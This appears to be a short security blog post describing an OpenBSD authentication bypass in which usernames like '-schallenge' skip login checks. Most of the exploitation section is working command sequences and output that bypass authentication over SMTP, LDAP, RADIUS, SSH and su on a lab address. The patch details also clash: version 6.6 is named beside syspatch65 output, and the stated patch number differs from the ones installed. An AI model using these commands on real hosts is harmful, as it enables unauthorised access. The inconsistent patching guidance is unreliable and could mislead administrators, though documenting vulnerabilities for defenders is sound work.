New authentication bypass vulnerability found in OpenBSD
Sometimes zero-days in widely used software are the simplest things.
A remote authentication bypass vulnerability has been found in
the latest version of OpenBSD, which is 6.6.
Because of insufficient username validation in libc,
a remote third party can exploit the libc login function.
If you are running OpenBSD,
it is time to run syspatch:
# syspatch
Get/Verify syspatch65-011_expat.tgz 100% |*********| 588 KB 00:02
Installing patch 011_expat
Get/Verify syspatch65-012_sysupgr... 100% |********| 11482 00:00
Installing patch 012_sysupgrade
Relinking to create unique kernel... done; reboot to load the new kernel
Errata can be reviewed under /var/syspatch
The fix has been published as the latest patch, 010_libcauth.patch.
Exploiting the authentication bypass
A report of the vulnerability has been published
on the Bugtraq mailing list.
The vulnerability can easily be exploited by providing a
username with the flag “-schallenge”
(or “-schallenge:passwd” to force a passwd-style authentication).
The report describes the vulnerability and the affected components:
if authentication in a rule set is done by just appending “auth”,
then your system is vulnerable.
Authentication can be bypassed as follows:
$ printf '\0-schallenge\0whatever' | openssl base64
AC1zY2hhbGxlbmdlAHdoYXRldmVy
$ openssl s_client -connect 192.168.56.121:25 -starttls smtp
...
EHLO client.example.com
...
AUTH PLAIN AC1zY2hhbGxlbmdlAHdoYXRldmVy
235 2.0.0 Authentication succeeded
$ ldapsearch -H ldap://192.168.56.121 -O none -U invaliduser -w whatever
SASL/PLAIN authentication started
ldap_sasl_interactive_bind_s: Invalid credentials (49)
$ ldapsearch -H ldap://192.168.56.121 -O none -U -schallenge -w whatever
SASL/PLAIN authentication started
SASL username: -schallenge
...
# numResponses: 1
If bsdauth is enabled in /etc/radiusd.conf:
$ radiusctl test 192.168.56.121 secret -schallenge password whatever
...
Reply-Message = "Authentication succeeded"
$ ssh -v -F /dev/null -o PreferredAuthentications=keyboard-interactive \
    -o KbdInteractiveDevices=bsdauth -l -sresponse:passwd 192.168.56.121
...
debug1: Next authentication method: keyboard-interactive
$ su -L -- -schallenge
Segmentation fault
This blog post is part of the exploit of the day series,
where we write short descriptions of interesting
exploits that we index.